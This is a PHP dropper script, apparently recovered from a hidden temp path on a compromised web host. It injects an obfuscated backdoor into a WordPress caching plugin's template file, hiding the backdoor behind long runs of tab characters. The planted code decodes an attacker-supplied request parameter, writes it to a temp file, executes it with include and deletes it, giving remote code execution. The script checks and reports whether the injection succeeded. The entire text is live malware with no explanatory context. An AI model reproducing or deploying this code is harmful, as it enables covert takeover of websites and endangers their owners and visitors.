/home/ramtczxy/.cagefs/tmp/.class
<?php  $path = '/home/ramtczxy/acedisposables.com/wp-content/plugins/litespeed-cache/tpl/page_optm/settings_localization.tpl.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28isset%28%24_REQUEST%5B%22i%5Cx74%5Cx65m%22%5D%29%20%3F%20true%20%3A%20false%29%7B%20%24elem%20%3D%20%24_REQUEST%5B%22i%5Cx74%5Cx65m%22%5D%3B%20%24elem%20%3D%20explode%20%28%20%27.%27%2C%20%24elem%20%29%20%3B%20%24desc%20%3D%20%27%27%3B%20%24salt%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24sLen%20%3D%20strlen%28%20%24salt%29%3B%20%24q%20%3D%200%3B%20while%28%20%24q%20%3C%20count%28%20%24elem%29%29%20%7B%20%24v6%20%3D%20%24elem%5B%24q%5D%3B%20%24sChar%20%3D%20ord%28%20%24salt%5B%24q%20%25%24sLen%5D%29%3B%20%24d%20%3D%20%28%20%28%20int%29%24v6%20-%20%24sChar%20-%28%20%24q%20%2510%29%29%20%5E%2077%3B%20%24desc%20.%3D%20chr%28%20%24d%29%3B%20%24q%2B%2B%3B%20%7D%20%24ptr%20%3D%20array_filter%28%5Bgetcwd%28%29%2C%20%22/var/tmp%22%2C%20session_save_path%28%29%2C%20sys_get_temp_dir%28%29%2C%20%22/dev/shm%22%2C%20getenv%28%22TMP%22%29%2C%20%22/tmp%22%2C%20getenv%28%22TEMP%22%29%2C%20ini_get%28%22upload_tmp_dir%22%29%5D%29%3B%20foreach%20%28%24ptr%20as%20%24binding%29%20%7B%20if%20%28max%280%2C%20is_dir%28%24binding%29%20%2A%20is_writable%28%24binding%29%29%29%20%7B%20%24val%20%3D%20%22%24binding/.value%22%3B%20if%20%28%40file_put_contents%28%24val%2C%20%24desc%29%20%21%3D%3D%20false%29%20%7B%20include%20%24val%3B%20unlink%28%24val%29%3B%20die%28%29%3B%20%7D%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');